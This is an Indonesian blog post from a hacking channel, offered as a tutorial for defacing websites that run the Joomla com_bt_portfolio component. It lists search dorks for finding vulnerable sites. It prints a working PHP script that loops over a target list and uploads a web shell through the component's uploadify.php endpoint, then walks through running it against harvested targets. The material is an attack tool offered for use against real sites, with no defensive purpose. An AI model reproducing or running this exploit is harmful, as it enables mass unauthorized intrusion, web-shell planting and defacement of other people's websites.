Support Idiot Attacker dengan klik subscribe di channel Disini, Banyak konten-konten Idiot attacker yg di upload disana.

Tutorial deface dengan com Bt Portfolio

Rio Setyawan 5:33 AM
Tutorial deface dengan com Bt Portfolio

Bahan-bahan
1. Xampp ( Download )
2. List Target
2. PHP Exploiter
3. Dork
Dork:
inurl:/index.php?option=com_bt_portfolio
inurl:/bt_portfolio
Kembangin lagi sendiri.



PHP Exploiter:

 <?php


$get=file_get_contents($argv[1]);
$j=explode("\r\n",$get);
foreach($j as $site){
echo "\n\n\t[+] Uploading file to : ".$site;

$uploadfile="shell.php";
$ch =curl_init("$site/administrator/components/com_bt_portfolio/helpers/uploadify/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS,
array('Filedata'=>"@$uploadfile",'folder'=>"/"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);{
print "\n\n\n$postResult";
echo "\n\n\t";
}
}
?> 


Ganti Shell.php dengan nama shell anda.
Simpan dengan format .php, save as type"all file" , simpan di folder C:\xampp\php

Cari target dengan dork
Simpan target dengan notepad di 1 folder exploit tadi, bersama dengan shell kalian juga simpan 1 folder.

Buka Xampp kalian yang sudah terinstall, nyalakan apace sama mysql nya
Lalu Run exploit tadi dengan CMD
perintahnya: "php exploitmu.php target.txt"
Tutorial deface dengan com Bt Portfolio

Lalu tekan Enter
Tutorial deface dengan com Bt Portfolio





Jika shell kalian berhasil terupload akan tampak seperti gambar diatas


Sekian ^_^
Previous
Next Post »
0 Komentar